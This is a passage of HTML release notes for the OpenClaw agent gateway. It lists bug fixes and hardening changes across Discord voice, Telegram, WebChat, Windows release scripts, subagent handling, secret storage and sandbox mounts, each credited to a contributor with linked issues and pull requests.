<li>Gateway/boot: run <code>BOOT.md</code> startup checks in an isolated boot session so gateway restarts do not overwrite the agent's main session mapping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504750110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85479" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85479/hovercard" href="https://github.com/openclaw/openclaw/pull/85479">#85479</a>)</li>
<li>Meeting Notes: include a speaker-labeled transcript section in generated summaries so Discord group voice captures show who said each captured utterance.</li>
<li>Discord/voice: recover stale realtime playback state when Discord stream-close/player-idle events do not arrive, and keep generated runtime plugin aliases available after postbuild rewrites.</li>
<li>Discord/voice: keep realtime playback running when meeting notes attaches to an existing voice session or a realtime consult starts, and route realtime user transcripts into meeting notes.</li>
<li>Config/secrets: preflight active runtime SecretRefs before root and include config writes persist, and roll back unchanged file/env state when post-write refresh fails. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076550684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46531" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46531/hovercard" href="https://github.com/openclaw/openclaw/issues/46531">#46531</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4483477091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84454" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84454/hovercard" href="https://github.com/openclaw/openclaw/pull/84454">#84454</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>CLI/models: preserve SecretRef-backed custom provider <code>apiKey</code> markers when <code>models status</code> regenerates <code>models.json</code>, avoiding resolved plaintext secrets on disk. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488302083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84632" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84632/hovercard" href="https://github.com/openclaw/openclaw/issues/84632">#84632</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488645548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84658" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84658/hovercard" href="https://github.com/openclaw/openclaw/pull/84658">#84658</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>WhatsApp/auto-reply: deliver deferred media replies through the foreground reply fence so overlapping no-reply turns no longer hide already visible responses. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505746494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85517" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85517/hovercard" href="https://github.com/openclaw/openclaw/pull/85517">#85517</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cavit99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cavit99">@cavit99</a>.</li>
<li>Sessions/security: replace agent-to-agent wildcard allowlist regexes with a precompiled linear matcher so cross-agent access checks avoid backtracking-prone patterns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4509772199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85849" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85849/hovercard" href="https://github.com/openclaw/openclaw/pull/85849">#85849</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>.</li>
<li>WebChat: keep the run-complete indicator in progress until deferred history replay renders the assistant reply, so Done no longer appears before response text. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503058453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85374" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85374/hovercard" href="https://github.com/openclaw/openclaw/issues/85374">#85374</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Agents/tools: give timed-out or cancelled process trees a bounded SIGTERM cleanup window before SIGKILL while preserving tree-aware cancellation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4260251585" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66399" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66399/hovercard" href="https://github.com/openclaw/openclaw/issues/66399">#66399</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4509890128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85865" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85865/hovercard" href="https://github.com/openclaw/openclaw/pull/85865">#85865</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>.</li>
<li>Agents/subagents: treat aborted subagent stop reasons as killed terminal failures so parent sessions get error announcements instead of silent success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331519192" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72293" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72293/hovercard" href="https://github.com/openclaw/openclaw/issues/72293">#72293</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4509845139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85860" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85860/hovercard" href="https://github.com/openclaw/openclaw/pull/85860">#85860</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>.</li>
<li>Agents/providers: clamp proxy-like OpenAI Chat Completions output caps against the final request payload so strict local/API-compatible servers no longer reject prompts that already consume part of the context window. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463346817" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83086/hovercard" href="https://github.com/openclaw/openclaw/issues/83086">#83086</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510107154" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85889" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85889/hovercard" href="https://github.com/openclaw/openclaw/pull/85889">#85889</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rendrag-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rendrag-git">@rendrag-git</a>.</li>
<li>Agents/compaction: skip agent-harness preflight for provider-owned CLI runtime sessions so over-threshold Claude CLI sessions continue through normal compaction instead of failing on a missing harness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492387826" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84857" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84857/hovercard" href="https://github.com/openclaw/openclaw/issues/84857">#84857</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492896072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84878" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84878/hovercard" href="https://github.com/openclaw/openclaw/pull/84878">#84878</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Codex/app-server: keep successful native hook relays available through a short post-turn grace window so late Codex hook subprocesses can finish policy enforcement without clearing a replacement relay. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4474425104" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83987" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83987/hovercard" href="https://github.com/openclaw/openclaw/pull/83987">#83987</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Control UI/config: save form-mode edits from the source config snapshot so runtime-only provider defaults like empty <code>models.providers.&lt;id&gt;.baseUrl</code> are not written back and rejected. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4509599522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85831" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85831/hovercard" href="https://github.com/openclaw/openclaw/issues/85831">#85831</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</li>
<li>Browser/existing-session: launch Chrome DevTools MCP with usage statistics disabled by default so its telemetry watchdog stays off unless an operator explicitly opts in. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510091383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85886" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85886/hovercard" href="https://github.com/openclaw/openclaw/pull/85886">#85886</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rohitjavvadi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rohitjavvadi">@rohitjavvadi</a>.</li>
<li>Telegram: normalize legacy durable group retry targets before retry sends, polls, and pins so group retries keep using the real chat id. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4507163567" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85656" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85656/hovercard" href="https://github.com/openclaw/openclaw/pull/85656">#85656</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>.</li>
<li>Agents/PDF: route MiniMax PDF fallback policy through plugin metadata so MiniMax uses text extraction instead of VLM image fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506610863" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85590/hovercard" href="https://github.com/openclaw/openclaw/pull/85590">#85590</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506467516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85575/hovercard" href="https://github.com/openclaw/openclaw/issues/85575">#85575</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>CLI/plugins: tighten timeout, numeric option, media payload, permission, profile/TLS, plugin metadata, JSON, and remote URL handling; prevent stuck progress/app-server/IRC/Synology/Twitch waits; and keep imported chat history ordering stable.</li>
<li>Telegram/config: suppress the missing <code>accounts.default</code> warning when <code>channels.telegram.defaultAccount</code> names a configured account that also sorts first. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4474104482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83948/hovercard" href="https://github.com/openclaw/openclaw/issues/83948">#83948</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crypto86m/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crypto86m">@crypto86m</a>.</li>
<li>Telegram: serialize visible topic replies through core reply-lane admission so heartbeat and queued follow-up turns cannot continue ownerless or misroute responses. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508034086" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85709/hovercard" href="https://github.com/openclaw/openclaw/pull/85709">#85709</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WebChat: summarize internal message-tool source replies so tool cards no longer duplicate the visible reply body. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491292661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84773/hovercard" href="https://github.com/openclaw/openclaw/pull/84773">#84773</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jason-allen-oneal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jason-allen-oneal">@jason-allen-oneal</a>.</li>
<li>Gateway/WebChat: hide duplicate <code>gateway-injected</code> assistant rows when Cursor ACP already persisted the same <code>acp-runtime</code> reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508573154" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85741/hovercard" href="https://github.com/openclaw/openclaw/issues/85741">#85741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lxf-lxf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lxf-lxf">@lxf-lxf</a>.</li>
<li>WebChat: scope the visible attachment button to its own composer file input so clicking Upload reliably opens the file picker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4474133617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83952/hovercard" href="https://github.com/openclaw/openclaw/pull/83952">#83952</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080664579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47983" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47983/hovercard" href="https://github.com/openclaw/openclaw/issues/47983">#47983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jason-allen-oneal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jason-allen-oneal">@jason-allen-oneal</a>.</li>
<li>Gateway: preserve deferred lifecycle-error cleanup across later non-terminal events so provider timeouts can persist failed session state instead of leaving sessions stuck running. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4500457730" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85256" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85256/hovercard" href="https://github.com/openclaw/openclaw/pull/85256">#85256</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233422692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63819" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63819/hovercard" href="https://github.com/openclaw/openclaw/issues/63819">#63819</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Gateway/update: stop treating inherited macOS <code>XPC_SERVICE_NAME</code> values as launchd supervision during update respawn, so GUI-spawned gateways use detached respawn instead of exiting for a missing LaunchAgent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499885357" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85224/hovercard" href="https://github.com/openclaw/openclaw/issues/85224">#85224</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/richardmqq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/richardmqq">@richardmqq</a>.</li>
<li>Agents/subagents: report tool-only child progress during timeout summaries instead of showing no visible output.</li>
<li>Telegram/ACP: preserve explicit <code>:topic:</code> conversation suffixes when inbound ACP targets do not carry a separate thread id.</li>
<li>Browser/proxy: bypass the managed proxy for the exact local managed Chrome CDP readiness and DevTools WebSocket endpoints, so <code>openclaw browser start</code> works when the operator proxy blocks loopback egress. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464834671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83255/hovercard" href="https://github.com/openclaw/openclaw/pull/83255">#83255</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lightcap/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lightcap">@lightcap</a>.</li>
<li>Ollama: bypass the managed proxy for configured local embedding origins while keeping SSRF guardrails on unconfigured targets. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>OpenAI/images: route Codex API-key image generation through the native OpenAI Images API instead of the Codex OAuth streaming backend, avoiding 401s from valid API keys.</li>
<li>Agents/OpenAI completions: omit empty tool payload fields for proxy-like OpenAI-compatible endpoints so strict vLLM-style servers accept tool-free turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4509644563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85835" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85835/hovercard" href="https://github.com/openclaw/openclaw/pull/85835">#85835</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rendrag-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rendrag-git">@rendrag-git</a>.</li>
<li>Sandbox: keep workspace skill mounts read-only for remote container-cwd file operations and reject symlinked skill roots before creating protected overlays. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506614699" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85591" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85591/hovercard" href="https://github.com/openclaw/openclaw/pull/85591">#85591</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jason-allen-oneal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jason-allen-oneal">@jason-allen-oneal</a>.</li>
<li>Scripts/Windows: route remaining QA, release, profile, and live-media <code>pnpm</code> launches through the managed runner so native Windows avoids brittle <code>.cmd</code> execution and shell-argv warnings.</li>
<li>Release: align generated config/API baselines and the meeting-notes plugin version so release preflight stays green on native Windows.</li>
<li>Install/Windows: run Git hook setup through a Node prepare helper so native Windows installs no longer print POSIX shell errors.</li>
<li>Checks/Windows: chunk and serialize extension oxlint shards on native Windows so changed gates avoid Go-backed linter memory spikes.</li>
<li>Release/Windows: run installed <code>openclaw.cmd</code> verification through explicit <code>cmd.exe</code> wrapping so npm prepublish/postpublish checks avoid Node shell-argv warnings.</li>
<li>Release/Windows: run release-check npm pack/install/root probes through the shared npm runner so native Windows avoids bare <code>npm</code> lookup and <code>.cmd</code> shell-argv handling.</li>
<li>Release/Windows: run cross-OS release check <code>.cmd</code> shims through explicit <code>cmd.exe</code> wrapping so native Windows install and gateway probes avoid Node shell-argv handling.</li>
<li>Control UI/Windows: run i18n Pi, npm, and pnpm helper commands through explicit Windows runners so native Windows translation sync avoids brittle <code>.cmd</code> launches.</li>
<li>Scripts/Windows: run the Z.AI fallback repro through the shared pnpm runner so native Windows avoids raw <code>.cmd</code> launches.</li>
<li>Codex/Windows: run app-server protocol formatting through the shared pnpm runner so native Windows avoids raw <code>.cmd</code> launches.</li>
<li>Plugins/Windows: run plugin npm package staging through the shared npm runner so native Windows release checks avoid bare <code>npm</code> lookup and <code>.cmd</code> shell-argv handling.</li>
<li>Checks/Windows: route full <code>pnpm check</code> stage commands through the managed child runner so Windows avoids Node shell-argv deprecation warnings there too.</li>
<li>Agents/fs: allow workspace-only host write/edit tools to write through in-workspace symlink directory parents while preserving outside-workspace symlink rejection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4489773167" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84696" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84696/hovercard" href="https://github.com/openclaw/openclaw/issues/84696">#84696</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garbagenetwork/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garbagenetwork">@garbagenetwork</a>.</li>
<li>Checks/Windows: run managed child commands through explicit <code>cmd.exe</code> wrapping instead of Node shell mode with argv, avoiding Node 24 subprocess deprecation warnings during changed checks.</li>
<li>Gateway: omit internal stream-error placeholder entries from agent prompt history so failed assistant turns are not replayed as model-authored text. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4507093570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85652" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85652/hovercard" href="https://github.com/openclaw/openclaw/pull/85652">#85652</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</li>
<li>Sessions: enforce the session write-lock max-hold policy during lock acquisition so long-held locks can be reclaimed before the stale-lock window. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508768461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85764/hovercard" href="https://github.com/openclaw/openclaw/pull/85764">#85764</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/njuboy11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/njuboy11">@njuboy11</a>.</li>
<li>Sessions/status: preserve user-facing model, fallback, usage, and cost attribution when internal subagent handoff runs use fallback models. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508383924" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85726/hovercard" href="https://github.com/openclaw/openclaw/pull/85726">#85726</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497481106" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85082" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85082/hovercard" href="https://github.com/openclaw/openclaw/issues/85082">#85082</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</li>
<li>Install/update: honor <code>OPENCLAW_HOME</code> when deriving default dev checkout and installer onboarding paths, while keeping explicit <code>OPENCLAW_GIT_DIR</code> and <code>OPENCLAW_CONFIG_PATH</code> overrides authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130936033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54014/hovercard" href="https://github.com/openclaw/openclaw/issues/54014">#54014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robertPiro/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robertPiro">@robertPiro</a>.</li>
<li>Models: prune retired Groq, GitHub Copilot, OpenAI, xAI, and old Claude catalog entries, with doctor migration to upgrade existing configs to current provider refs.</li>
<li>Plugins/Gateway: treat non-empty return values from plugin gateway method handlers as successful responses so <code>openclaw gateway call</code> no longer times out after completed plugin work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4191852021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59470" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59470/hovercard" href="https://github.com/openclaw/openclaw/issues/59470">#59470</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HTMG23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HTMG23">@HTMG23</a>.</li>
<li>Doctor/update: recognize junction-backed source checkouts as git installs by comparing canonical paths before showing package-manager update guidance. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4455291382" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82215" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82215/hovercard" href="https://github.com/openclaw/openclaw/issues/82215">#82215</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>.</li>
<li>Channels: honor <code>/verbose on</code> for tool/progress summaries across direct chats, groups, channels, and forum topics while preserving quiet default behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505095597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85488" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85488/hovercard" href="https://github.com/openclaw/openclaw/pull/85488">#85488</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kurplunkin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kurplunkin">@kurplunkin</a>.</li>
<li>Update: keep the detached gateway restart handoff best-effort when the restart script process cannot be spawned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4473950124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83892" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83892/hovercard" href="https://github.com/openclaw/openclaw/issues/83892">#83892</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davinci282828/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davinci282828">@davinci282828</a>.</li>
<li>Telegram: persist the prompt-context message cache through plugin state and record bot-authored replies after sends and draft streaming so later turns can include prior assistant replies without relying on the JSON sidecar. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499953215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85231/hovercard" href="https://github.com/openclaw/openclaw/pull/85231">#85231</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keshavbotagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keshavbotagent">@keshavbotagent</a>.</li>
<li>Agents/subagents: keep Codex persona and user workspace files turn-scoped so native Codex subagents inherit only shared tool guidance by default. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4509412584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85811" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85811/hovercard" href="https://github.com/openclaw/openclaw/pull/85811">#85811</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lastguru-net/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lastguru-net">@lastguru-net</a>.</li>
